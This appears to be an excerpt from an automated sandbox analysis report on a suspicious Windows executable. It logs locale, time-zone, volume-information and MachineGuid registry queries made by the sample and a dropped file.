Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_000000018005AC5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 7_2_000000018004ED7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW, 7_2_000000018005AEA8
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Queries volume information: C:\Users\user\Microsoft.NET\netframework4.7\version\ng3DJyCjjqIdyv.zip VolumeInformation
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Queries volume information: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas VolumeInformation
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A4AB4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 6_2_00007FF6B40A4AB4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00000001800502BC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 6_2_00000001800502BC
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid